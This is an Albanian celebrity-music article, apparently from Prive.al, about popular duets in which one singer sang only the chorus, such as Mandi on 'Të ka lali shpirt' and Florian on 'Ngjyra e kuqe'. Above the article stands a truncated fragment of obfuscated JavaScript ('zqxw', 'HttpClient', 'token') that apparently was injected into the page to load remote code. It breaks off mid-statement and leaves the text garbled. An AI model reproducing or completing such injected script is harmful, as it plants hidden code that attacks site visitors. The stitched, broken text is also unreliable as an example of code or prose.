;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

‘HIT’ NGA KËNGËTARËT QË KËNDUAN VETËM REFRENIN!

By

Bashkëpunimet janë gjithmonë të sukesesshme, por ajo që bie në sy është refreni, pasiqë kur ka më shumë se një artist, pjesa kulmore e këngës i besohet vetëm dikujt.

Shumë këngë janë kthyer në fenomene vetëm për shkak të refrenit të saj.

‘Të ka lali shpirt’ vazhdon të jetë senzacion në diskografinë shqiptare por jo vetëm e gjithë jehonën mediatike asaj ia dha refreni i kënduar nga Mandi.

Zëri i tij u bë pjesë e përkthimeve të kësaj kënge në gjuhë tjera.

‘Origjinale’ ishte e para që solli frymën e muzikës ballkanike tek shqiptarët. E veçanta e saj nuk ishte dueti mes Aurelës dhe Dr. Florit pasiqë i kishim parë më parë. Mirëpo elementi që iu shtua në refren e bëri këngën interesante dhe hit për një kohë të gjatë.

Marseli ishte ai i duhuri për pjesën kryesore të këngës dhe ‘ja ku erdhi ai’ i cili pas këtij projekti solli shumë projekte të tij.

Skena u bë më dinamike kur u shtua një zë fëmije por që këndonte barabartë me të rriturit e në refren i sfidonte të gjithë.

Bëhet fjalë për Florianin i cili edhe pse i vogël tek ‘Ngjyra e kuqe’ u pëlqye shumë dhe u bë një fenomen i muzikës sonë.

Nora dhe Skivi u bënë bashkë për ‘Na’, këngë që u plotësua në refren nga zëri i Mimoza Shkodrës. Madje vargjet e kënduara nga Shkodra janë të memorizuara nga të gjithë. /

Me ‘Roll’ u bë një ndër emrat më të njohur të skenës sonë muzikore, por zëri i saj u pëlqye shumë kur këndoi refrenin e këngës ‘Edhe pak’.

Dhurata Dora e vetmja femër në bashkëpunimin Blunt, Real dhe Lumi b dominoi në refren./Prive.al

Artikuj të ngjashëm